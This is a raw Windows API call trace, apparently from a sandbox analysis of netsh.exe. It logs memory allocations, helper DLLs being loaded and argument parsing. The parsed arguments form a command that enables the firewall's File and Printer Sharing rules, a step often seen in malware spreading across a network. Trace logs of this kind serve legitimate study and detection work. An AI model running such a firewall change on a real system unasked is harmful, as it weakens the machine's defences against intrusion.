lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0110.150] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0110.150] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0110.150] GetProcessHeap () returned 0x410000 [0110.150] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x168) returned 0x44b788 [0110.150] GetProcessHeap () returned 0x410000 [0110.150] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x440150 [0110.150] GetProcessHeap () returned 0x410000 [0110.150] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x43f688 [0110.150] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0110.150] GetProcessHeap () returned 0x410000 [0110.150] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d958 | out: hHeap=0x410000) returned 1 [0110.150] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x741b0000 [0111.030] GetProcAddress (hModule=0x741b0000, lpProcName="InitHelperDll") returned 0x741bc7d8 [0111.030] InitHelperDll () returned 0x0 [0111.030] RegisterHelper () returned 0x0 [0111.030] GetProcessHeap () returned 0x410000 [0111.030] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdc8) returned 0x44df80 [0111.031] GetProcessHeap () returned 0x410000 [0111.031] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44aa00 | out: hHeap=0x410000) returned 1 [0111.031] RegEnumValueW (in: hKey=0xac, dwIndex=0x11, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="peerdistsh", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0111.031] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0111.031] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0111.031] GetProcessHeap () returned 0x410000 [0111.031] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17c) returned 0x43d958 [0111.031] GetProcessHeap () returned 0x410000 [0111.032] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16) returned 0x43f6a8 [0111.032] GetProcessHeap () returned 0x410000 [0111.032] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1e) returned 0x448c40 [0111.032] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0111.032] GetProcessHeap () returned 0x410000 [0111.032] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44b788 | out: hHeap=0x410000) returned 1 [0111.032] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x70b10000 [0111.390] GetProcAddress (hModule=0x70b10000, lpProcName="InitHelperDll") returned 0x70b8c796 [0111.390] InitHelperDll () returned 0x0 [0111.390] RegisterHelper () returned 0x0 [0111.390] GetProcessHeap () returned 0x410000 [0111.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe10) returned 0x449fc8 [0111.390] GetProcessHeap () returned 0x410000 [0111.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44df80 | out: hHeap=0x410000) returned 1 [0111.390] RegisterHelper () returned 0x0 [0111.390] GetProcessHeap () returned 0x410000 [0111.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe58) returned 0x44df80 [0111.390] GetProcessHeap () returned 0x410000 [0111.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449fc8 | out: hHeap=0x410000) returned 1 [0111.391] RegCloseKey (hKey=0xac) returned 0x0 [0111.391] GetProcessHeap () returned 0x410000 [0111.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428148 | out: hHeap=0x410000) returned 1 [0111.391] GetProcessHeap () returned 0x410000 [0111.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428168 | out: hHeap=0x410000) returned 1 [0111.393] GetProcessHeap () returned 0x410000 [0111.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x48) returned 0x449080 [0111.393] GetProcessHeap () returned 0x410000 [0111.393] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0111.393] RegisterContext () returned 0x0 [0111.395] GetProcessHeap () returned 0x410000 [0111.395] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x48) returned 0x4490d0 [0111.395] GetProcessHeap () returned 0x410000 [0111.395] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0125.384] RegisterContext () returned 0x0 [0125.385] GetProcessHeap () returned 0x410000 [0125.385] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x48) returned 0x449120 [0125.385] GetProcessHeap () returned 0x410000 [0125.385] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0125.385] RegisterContext () returned 0x0 [0125.385] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0125.385] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0125.385] GetProcessHeap () returned 0x410000 [0125.385] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43dcf0 [0125.385] GetProcessHeap () returned 0x410000 [0125.385] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449120 | out: hHeap=0x410000) returned 1 [0125.788] RegisterContext () returned 0x0 [0125.789] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0125.789] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0125.789] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0125.789] GetProcessHeap () returned 0x410000 [0125.789] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x452a68 [0125.789] GetProcessHeap () returned 0x410000 [0125.789] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43dcf0 | out: hHeap=0x410000) returned 1 [0125.789] RegisterContext () returned 0x0 [0125.790] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x452b48 [0125.790] GetProcessHeap () returned 0x410000 [0125.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452a68 | out: hHeap=0x410000) returned 1 [0125.790] RegisterContext () returned 0x0 [0125.790] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43dcf0 [0125.790] GetProcessHeap () returned 0x410000 [0125.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4490d0 | out: hHeap=0x410000) returned 1 [0125.791] RegisterContext () returned 0x0 [0125.791] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x452a68 [0125.791] GetProcessHeap () returned 0x410000 [0125.791] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43dcf0 | out: hHeap=0x410000) returned 1 [0125.791] RegisterContext () returned 0x0 [0125.791] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x452de8 [0125.791] GetProcessHeap () returned 0x410000 [0125.791] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452a68 | out: hHeap=0x410000) returned 1 [0125.791] RegisterContext () returned 0x0 [0125.791] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x168) returned 0x44ad50 [0125.791] GetProcessHeap () returned 0x410000 [0125.791] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452de8 | out: hHeap=0x410000) returned 1 [0126.873] RegisterContext () returned 0x0 [0126.873] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1b0) returned 0x452de8 [0126.873] GetProcessHeap () returned 0x410000 [0126.873] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ad50 | out: hHeap=0x410000) returned 1 [0126.874] RegisterContext () returned 0x0 [0126.874] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1f8) returned 0x44ad50 [0126.874] GetProcessHeap () returned 0x410000 [0126.874] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452de8 | out: hHeap=0x410000) returned 1 [0126.874] RegisterContext () returned 0x0 [0126.874] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x48) returned 0x4490d0 [0126.874] GetProcessHeap () returned 0x410000 [0126.874] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0126.874] RegisterContext () returned 0x0 [0126.874] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43dcf0 [0126.874] GetProcessHeap () returned 0x410000 [0126.875] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4490d0 | out: hHeap=0x410000) returned 1 [0126.875] RegisterContext () returned 0x0 [0126.875] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x452a68 [0126.875] GetProcessHeap () returned 0x410000 [0126.875] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43dcf0 | out: hHeap=0x410000) returned 1 [0126.875] RegisterContext () returned 0x0 [0126.875] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x452de8 [0126.875] GetProcessHeap () returned 0x410000 [0126.875] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452a68 | out: hHeap=0x410000) returned 1 [0126.875] RegisterContext () returned 0x0 [0126.875] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x240) returned 0x44af50 [0126.875] GetProcessHeap () returned 0x410000 [0126.875] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ad50 | out: hHeap=0x410000) returned 1 [0126.875] RegisterContext () returned 0x0 [0126.875] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x288) returned 0x44b198 [0126.875] GetProcessHeap () returned 0x410000 [0126.875] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44af50 | out: hHeap=0x410000) returned 1 [0126.876] RegisterContext () returned 0x0 [0126.876] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2d0) returned 0x44ad50 [0126.876] GetProcessHeap () returned 0x410000 [0126.876] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44b198 | out: hHeap=0x410000) returned 1 [0126.876] RegisterContext () returned 0x0 [0126.876] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x318) returned 0x44b028 [0126.876] GetProcessHeap () returned 0x410000 [0126.876] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ad50 | out: hHeap=0x410000) returned 1 [0126.877] RegisterContext () returned 0x0 [0126.877] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x48) returned 0x4490d0 [0126.877] GetProcessHeap () returned 0x410000 [0126.877] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0126.877] RegisterContext () returned 0x0 [0126.877] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43dcf0 [0126.877] GetProcessHeap () returned 0x410000 [0126.877] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4490d0 | out: hHeap=0x410000) returned 1 [0126.877] RegisterContext () returned 0x0 [0126.877] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x452a68 [0126.877] GetProcessHeap () returned 0x410000 [0126.878] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43dcf0 | out: hHeap=0x410000) returned 1 [0126.878] RegisterContext () returned 0x0 [0126.878] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x44ad50 [0126.878] GetProcessHeap () returned 0x410000 [0126.878] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452a68 | out: hHeap=0x410000) returned 1 [0126.878] RegisterContext () returned 0x0 [0126.878] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x168) returned 0x44ae78 [0126.878] GetProcessHeap () returned 0x410000 [0126.878] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ad50 | out: hHeap=0x410000) returned 1 [0126.878] RegisterContext () returned 0x0 [0126.878] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1b0) returned 0x44b348 [0126.878] GetProcessHeap () returned 0x410000 [0126.878] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ae78 | out: hHeap=0x410000) returned 1 [0126.878] RegisterContext () returned 0x0 [0126.878] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x48) returned 0x4490d0 [0126.878] GetProcessHeap () returned 0x410000 [0126.878] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0126.879] RegisterContext () returned 0x0 [0126.879] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43dcf0 [0126.879] GetProcessHeap () returned 0x410000 [0126.879] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4490d0 | out: hHeap=0x410000) returned 1 [0126.879] RegisterContext () returned 0x0 [0126.879] RegisterContext () returned 0x0 [0126.879] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1f8) returned 0x44ad50 [0126.879] GetProcessHeap () returned 0x410000 [0126.879] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44b348 | out: hHeap=0x410000) returned 1 [0126.879] RegisterContext () returned 0x0 [0126.879] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x240) returned 0x44b348 [0126.879] GetProcessHeap () returned 0x410000 [0126.879] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ad50 | out: hHeap=0x410000) returned 1 [0126.879] RegisterContext () returned 0x0 [0126.879] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x360) returned 0x44b590 [0126.879] GetProcessHeap () returned 0x410000 [0126.879] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44b028 | out: hHeap=0x410000) returned 1 [0126.880] RegisterContext () returned 0x0 [0126.880] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3a8) returned 0x44ad50 [0126.880] GetProcessHeap () returned 0x410000 [0126.880] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44b590 | out: hHeap=0x410000) returned 1 [0126.880] RegisterContext () returned 0x0 [0126.880] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3f0) returned 0x452f10 [0126.881] GetProcessHeap () returned 0x410000 [0126.881] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ad50 | out: hHeap=0x410000) returned 1 [0126.881] RegisterContext () returned 0x0 [0126.881] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x48) returned 0x4490d0 [0126.881] GetProcessHeap () returned 0x410000 [0126.881] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0126.881] RegisterContext () returned 0x0 [0126.881] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x438) returned 0x44ad50 [0126.881] GetProcessHeap () returned 0x410000 [0126.881] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452f10 | out: hHeap=0x410000) returned 1 [0126.907] RegisterContext () returned 0x0 [0126.907] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x480) returned 0x4573d8 [0126.907] GetProcessHeap () returned 0x410000 [0126.907] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ad50 | out: hHeap=0x410000) returned 1 [0130.174] RegisterContext () returned 0x0 [0130.174] GetProcessHeap () returned 0x410000 [0130.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0130.183] RegisterContext () returned 0x0 [0130.184] GetProcessHeap () returned 0x410000 [0130.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4495d0 | out: hHeap=0x410000) returned 1 [0130.184] RegisterContext () returned 0x0 [0130.184] GetProcessHeap () returned 0x410000 [0130.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4573d8 | out: hHeap=0x410000) returned 1 [0130.184] RegisterContext () returned 0x0 [0130.184] GetProcessHeap () returned 0x410000 [0130.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0130.184] RegisterContext () returned 0x0 [0130.184] GetProcessHeap () returned 0x410000 [0130.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4495d0 | out: hHeap=0x410000) returned 1 [0130.184] RegisterContext () returned 0x0 [0130.184] RegisterContext () returned 0x0 [0130.185] RegisterContext () returned 0x0 [0130.185] GetProcessHeap () returned 0x410000 [0130.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a0f0 | out: hHeap=0x410000) returned 1 [0130.185] RegisterContext () returned 0x0 [0130.185] GetProcessHeap () returned 0x410000 [0130.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0130.270] RegisterContext () returned 0x0 [0130.271] GetProcessHeap () returned 0x410000 [0130.271] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4495d0 | out: hHeap=0x410000) returned 1 [0130.271] RegisterContext () returned 0x0 [0130.271] GetProcessHeap () returned 0x410000 [0130.271] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457470 | out: hHeap=0x410000) returned 1 [0130.271] RegisterContext () returned 0x0 [0130.271] GetProcessHeap () returned 0x410000 [0130.271] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457508 | out: hHeap=0x410000) returned 1 [0130.271] RegisterContext () returned 0x0 [0130.271] GetProcessHeap () returned 0x410000 [0130.271] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0130.271] RegisterContext () returned 0x0 [0130.271] GetProcessHeap () returned 0x410000 [0130.271] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4495d0 | out: hHeap=0x410000) returned 1 [0130.271] RegisterContext () returned 0x0 [0130.271] GetProcessHeap () returned 0x410000 [0130.271] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457710 | out: hHeap=0x410000) returned 1 [0130.272] RegisterContext () returned 0x0 [0130.272] GetProcessHeap () returned 0x410000 [0130.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0130.272] RegisterContext () returned 0x0 [0130.272] GetProcessHeap () returned 0x410000 [0130.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0130.272] RegisterContext () returned 0x0 [0130.272] GetProcessHeap () returned 0x410000 [0130.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a5c0 | out: hHeap=0x410000) returned 1 [0133.200] RegisterContext () returned 0x0 [0133.200] GetProcessHeap () returned 0x410000 [0133.200] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46aad8 | out: hHeap=0x410000) returned 1 [0133.200] RegisterContext () returned 0x0 [0133.200] GetProcessHeap () returned 0x410000 [0133.200] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0133.201] SetConsoleCtrlHandler (HandlerRoutine=0x15f7c89, Add=1) returned 1 [0133.201] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0133.201] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0133.201] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.202] FreeLibrary (hLibModule=0x76d30000) returned 1 [0133.202] _wcsicmp (_String1="advfirewall", _String2="-?") returned 52 [0133.202] _wcsicmp (_String1="advfirewall", _String2="-h") returned 52 [0133.202] _wcsicmp (_String1="advfirewall", _String2="?") returned 34 [0133.202] _wcsicmp (_String1="advfirewall", _String2="/?") returned 50 [0133.202] _wcsicmp (_String1="advfirewall", _String2="-v") returned 52 [0133.202] _wcsicmp (_String1="advfirewall", _String2="-a") returned 52 [0133.202] _wcsicmp (_String1="advfirewall", _String2="-c") returned 52 [0133.202] _wcsicmp (_String1="advfirewall", _String2="-f") returned 52 [0133.202] _wcsicmp (_String1="advfirewall", _String2="-r") returned 52 [0133.202] _wcsicmp (_String1="advfirewall", _String2="-u") returned 52 [0133.202] _wcsicmp (_String1="advfirewall", _String2="-p") returned 52 [0133.202] GetVersionExW (in: lpVersionInformation=0x3d76b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3d76b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0133.202] _vsnwprintf (in: _Buffer=0x15fb338, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x3d76a4 | out: _Buffer="6.1.7601") returned 8 [0133.202] _vsnwprintf (in: _Buffer=0x15fb748, _BufferCount=0x103, _Format="%d", _ArgList=0x3d7694 | out: _Buffer="7601") returned 4 [0133.202] _vsnwprintf (in: _Buffer=0x15fb540, _BufferCount=0x103, _Format="%d", _ArgList=0x3d7684 | out: _Buffer="1") returned 1 [0133.202] _vsnwprintf (in: _Buffer=0x15fb950, _BufferCount=0x103, _Format="%d", _ArgList=0x3d7674 | out: _Buffer="0") returned 1 [0133.202] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e7c8 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e7e0 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e7f8 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e810 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e828 [0133.203] wcscpy_s (in: _Destination=0x45e828, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e7f8 | out: hHeap=0x410000) returned 1 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e7e0 | out: hHeap=0x410000) returned 1 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e7e0 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e7f8 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9c) returned 0x46dce0 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e840 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x458a58 [0133.203] wcscpy_s (in: _Destination=0x458a58, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e858 [0133.203] GetProcessHeap () returned 0x410000 [0133.203] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x458a78 [0133.203] wcscpy_s (in: _Destination=0x458a78, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0133.203] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e870 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4572f0 [0133.204] wcscpy_s (in: _Destination=0x4572f0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e888 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa) returned 0x45e8a0 [0133.204] wcscpy_s (in: _Destination=0x45e8a0, _SizeInWords=0x5, _Source="rule" | out: _Destination="rule") returned 0x0 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e8b8 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x42) returned 0x449710 [0133.204] wcscpy_s (in: _Destination=0x449710, _SizeInWords=0x21, _Source="\"group=File and Printer Sharing\"" | out: _Destination="\"group=File and Printer Sharing\"") returned 0x0 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e8d0 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457300 [0133.204] wcscpy_s (in: _Destination=0x457300, _SizeInWords=0x4, _Source="new" | out: _Destination="new") returned 0x0 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e8e8 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe) returned 0x45e900 [0133.204] wcscpy_s (in: _Destination=0x45e900, _SizeInWords=0x7, _Source="enable" | out: _Destination="enable") returned 0x0 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e918 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4) returned 0x457310 [0133.204] wcscpy_s (in: _Destination=0x457310, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0133.204] GetProcessHeap () returned 0x410000 [0133.204] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e930 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457320 [0133.205] wcscpy_s (in: _Destination=0x457320, _SizeInWords=0x4, _Source="Yes" | out: _Destination="Yes") returned 0x0 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46dce0 | out: hHeap=0x410000) returned 1 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e7f8 | out: hHeap=0x410000) returned 1 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e7f8 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x458a98 [0133.205] wcscpy_s (in: _Destination=0x458a98, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a58 | out: hHeap=0x410000) returned 1 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e840 | out: hHeap=0x410000) returned 1 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e840 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x458a58 [0133.205] wcscpy_s (in: _Destination=0x458a58, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a98 | out: hHeap=0x410000) returned 1 